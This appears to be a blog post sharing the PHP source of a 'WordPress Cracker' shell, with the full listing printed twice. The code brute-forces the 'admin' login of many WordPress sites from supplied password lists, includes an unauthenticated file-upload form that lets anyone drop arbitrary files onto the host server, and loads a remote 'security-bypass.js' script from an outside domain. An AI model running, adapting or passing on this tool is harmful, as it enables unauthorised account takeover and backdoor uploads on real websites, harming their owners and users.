WordPress Cracker Shell PHP
<? @set_time_limit(0); ?> <html>
<head>
<title>WordPress Cracker</title>
</head>
<style type="text/css">
body,a{
background-color: black;
color: #BBBBBB;
font-family: Lucida Console,Tahoma;
font-size: 11px;
text-align: left;
}
input,select,textarea,table,button {
background: none repeat scroll 0 0 #000000;
border: 1px solid #990000;
color: #FFFFFF;
margin: 0;
font-family: Lucida Console,Tahoma;
font-size: 11px;
padding: 2px 4px;
}
input:hover, textarea:hover, select:hover, button:hover {
background: none repeat scroll 0 0 #220000;
border: 1px solid #FF0000;
}
option {
background: none repeat scroll 0 0 #000000;
}
a{
text-decoration: none;
}
textarea{
resize: none;
}
</style>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.11.0.js"></script>
<script type="text/JavaScript">
$(document).ready(function(){
$('pre').fadeIn(3000);
$('input***91;type="text"***93;').click(function(){
$(this).val('');
});
});
</script>
<body>
<center><pre style="display: none;"><font color="Lime" size="1">
_______ _______ ______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _ _______ _______
|\ /( ___ | ____ | __ \( ____ | ____ | ____ \( ____ ( ____ \ ( ____ ( ____ | ___ | ____ \ \ /( ____ ( ____ )
| ) ( | ( ) | ( )| ( \ ) ( )| ( )| ( \/| ( \/ ( \/ | ( \/ ( )| ( ) | ( \/ \ / / ( \/ ( )|
| | _ | | | | | (____)| | ) | (____)| (____)| (__ | (_____| (_____ _____| | | (____)| (___) | | | (_/ /| (__ | (____)|
| |( )| | | | | __) | | | _____) __) __) (_____ |_____ |_____) | | __) ___ | | | _ ( | __) | __)
| || || | | | | (\ ( | | ) | ( | (\ ( | ( ) | ) | | | | (\ ( | ( ) | | | ( \ \| ( | (\ (
| () () | (___) | ) \ \_| (__/ ) ) | ) \ \_| (____/\/\____) /\____) | | (____/\ ) \ \_| ) ( | (____/\ / \ \ (____/\ ) \ \__
(_______|_______)/ \__(______/|/ |/ \__(_______/\_______)_______) (_______// \__// \(_______/_/ \(_______// \__/
</pre></font></center>
<br/><br/><br/><br/>
<center>
<form action="" method="POST">
<p><strong>Websites</strong>
<strong>Passwords</strong></p>
<script type="text/javascript" src="http://security-dz.com/banding/security-bypass.js"></script>
<textarea cols='50' rows='20' name="websites" placeholder="Put the website without /wp-admin/"></textarea> <textarea cols='50' rows='20' name="password" placeholder="Put the Passwords here"></textarea>
<br /><br />
<input type="submit" name="crack" value="Crack Password">
</form>
</center>
<?php if(isset($_POST***91;'websites'***93;,$_POST***91;'password'***93;))
{
$websites = nl2br($_POST***91;'websites'***93;); $password = nl2br($_POST***91;'password'***93;);
$urls = explode('<br />',$websites); $passwords = explode('<br />',$password);
$pass_count = 0;
foreach ($urls as $http){
$url = trim($http)."/wp-login.php";
$check_url = substr($url,0,7);
if($check_url !="http://"){ $url = "http://".$url;
}
foreach($passwords as $pass){ $cracking_curl = curl_init(); curl_setopt($cracking_curl,CURLOPT_URL,"$url"); curl_setopt($cracking_curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$passwords***91;$pass_count***93;"); curl_setopt($cracking_curl,CURLOPT_USERAGENT,$_SERVER***91;'HTTP_USER_AGENT'***93;); curl_setopt($cracking_curl,CURLOPT_RETURNTRANSFER,TRUE); curl_setopt($cracking_curl,CURLOPT_CONNECTTIMEOUT,9000); curl_setopt($cracking_curl,CURLOPT_TIMEOUT,9000); curl_setopt($cracking_curl, CURLOPT_HEADER, true); $result = curl_exec($cracking_curl);
$status = curl_getinfo($cracking_curl);
if(preg_match("/ERROR|ERROR:|ERREUR|The password you entered for the|***1582;***1591;***1571;/i",$result) or $status***91;'http_code'***93;=='404'){
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='red'>Faild !</font><br />";
}else if($status***91;'http_code'***93;=='302' && preg_match("//",$result)){
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='green'>Cracked ***91;Password***93;</font> ----- > <b><font color='green'>$passwords***91;$pass_count***93;</font></b><br />";
}else{
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='orange'>Not Sure ! ***91;HTTP_CODE***93; -----> $status***91;http_code***93; ***91;Password***93; -----> $passwords***91;$pass_count***93;</font><br />";
}
if($pass_count == count($passwords) - 1){ $pass_count = 0;
}else{ $pass_count++;
}
}
}//foreach loop
} ?>
<center><br /><br /><br />
<FORM ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
Upload Files: <INPUT NAME="file" TYPE="file">
<INPUT TYPE="submit" name="up" VALUE="Send">
</FORM>
<center>
<? if(move_uploaded_file($_FILES***91;"file"***93;***91;"tmp_name"***93;,$_FILES***91;"file"***93;***91;"name"***93;)){
echo "<script>alert('uploaded :D')</script>";
} ?>
<br /><br /><br />
<center>Coded By Walid From Security-Dz.CoM</center>
</body>
</html>
<? @set_time_limit(0); ?> <html>
<head>
<title>WordPress Cracker</title>
</head>
<style type="text/css">
body,a{
background-color: black;
color: #BBBBBB;
font-family: Lucida Console,Tahoma;
font-size: 11px;
text-align: left;
}
input,select,textarea,table,button {
background: none repeat scroll 0 0 #000000;
border: 1px solid #990000;
color: #FFFFFF;
margin: 0;
font-family: Lucida Console,Tahoma;
font-size: 11px;
padding: 2px 4px;
}
input:hover, textarea:hover, select:hover, button:hover {
background: none repeat scroll 0 0 #220000;
border: 1px solid #FF0000;
}
option {
background: none repeat scroll 0 0 #000000;
}
a{
text-decoration: none;
}
textarea{
resize: none;
}
</style>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.11.0.js"></script>
<script type="text/JavaScript">
$(document).ready(function(){
$('pre').fadeIn(3000);
$('input***91;type="text"***93;').click(function(){
$(this).val('');
});
});
</script>
<body>
<center><pre style="display: none;"><font color="Lime" size="1">
_______ _______ ______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _ _______ _______
|\ /( ___ | ____ | __ \( ____ | ____ | ____ \( ____ ( ____ \ ( ____ ( ____ | ___ | ____ \ \ /( ____ ( ____ )
| ) ( | ( ) | ( )| ( \ ) ( )| ( )| ( \/| ( \/ ( \/ | ( \/ ( )| ( ) | ( \/ \ / / ( \/ ( )|
| | _ | | | | | (____)| | ) | (____)| (____)| (__ | (_____| (_____ _____| | | (____)| (___) | | | (_/ /| (__ | (____)|
| |( )| | | | | __) | | | _____) __) __) (_____ |_____ |_____) | | __) ___ | | | _ ( | __) | __)
| || || | | | | (\ ( | | ) | ( | (\ ( | ( ) | ) | | | | (\ ( | ( ) | | | ( \ \| ( | (\ (
| () () | (___) | ) \ \_| (__/ ) ) | ) \ \_| (____/\/\____) /\____) | | (____/\ ) \ \_| ) ( | (____/\ / \ \ (____/\ ) \ \__
(_______|_______)/ \__(______/|/ |/ \__(_______/\_______)_______) (_______// \__// \(_______/_/ \(_______// \__/
</pre></font></center>
<br/><br/><br/><br/>
<center>
<form action="" method="POST">
<p><strong>Websites</strong>
<strong>Passwords</strong></p>
<script type="text/javascript" src="http://security-dz.com/banding/security-bypass.js"></script>
<textarea cols='50' rows='20' name="websites" placeholder="Put the website without /wp-admin/"></textarea> <textarea cols='50' rows='20' name="password" placeholder="Put the Passwords here"></textarea>
<br /><br />
<input type="submit" name="crack" value="Crack Password">
</form>
</center>
<?php if(isset($_POST***91;'websites'***93;,$_POST***91;'password'***93;))
{
$websites = nl2br($_POST***91;'websites'***93;); $password = nl2br($_POST***91;'password'***93;);
$urls = explode('<br />',$websites); $passwords = explode('<br />',$password);
$pass_count = 0;
foreach ($urls as $http){
$url = trim($http)."/wp-login.php";
$check_url = substr($url,0,7);
if($check_url !="http://"){ $url = "http://".$url;
}
foreach($passwords as $pass){ $cracking_curl = curl_init(); curl_setopt($cracking_curl,CURLOPT_URL,"$url"); curl_setopt($cracking_curl,CURLOPT_POSTFIELDS,"log=admin&pwd=$passwords***91;$pass_count***93;"); curl_setopt($cracking_curl,CURLOPT_USERAGENT,$_SERVER***91;'HTTP_USER_AGENT'***93;); curl_setopt($cracking_curl,CURLOPT_RETURNTRANSFER,TRUE); curl_setopt($cracking_curl,CURLOPT_CONNECTTIMEOUT,9000); curl_setopt($cracking_curl,CURLOPT_TIMEOUT,9000); curl_setopt($cracking_curl, CURLOPT_HEADER, true); $result = curl_exec($cracking_curl);
$status = curl_getinfo($cracking_curl);
if(preg_match("/ERROR|ERROR:|ERREUR|The password you entered for the|***1582;***1591;***1571;/i",$result) or $status***91;'http_code'***93;=='404'){
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='red'>Faild !</font><br />";
}else if($status***91;'http_code'***93;=='302' && preg_match("//",$result)){
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='green'>Cracked ***91;Password***93;</font> ----- > <b><font color='green'>$passwords***91;$pass_count***93;</font></b><br />";
}else{
echo "<a href='$url' target='_blank'>$url</a> -----> <font color='orange'>Not Sure ! ***91;HTTP_CODE***93; -----> $status***91;http_code***93; ***91;Password***93; -----> $passwords***91;$pass_count***93;</font><br />";
}
if($pass_count == count($passwords) - 1){ $pass_count = 0;
}else{ $pass_count++;
}
}
}//foreach loop
} ?>
<center><br /><br /><br />
<FORM ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
Upload Files: <INPUT NAME="file" TYPE="file">
<INPUT TYPE="submit" name="up" VALUE="Send">
</FORM>
<center>
<? if(move_uploaded_file($_FILES***91;"file"***93;***91;"tmp_name"***93;,$_FILES***91;"file"***93;***91;"name"***93;)){
echo "<script>alert('uploaded :D')</script>";
} ?>
<br /><br /><br />
<center>Coded By Walid From Security-Dz.CoM</center>
</body>
</html>
0 Comments:
Post a Comment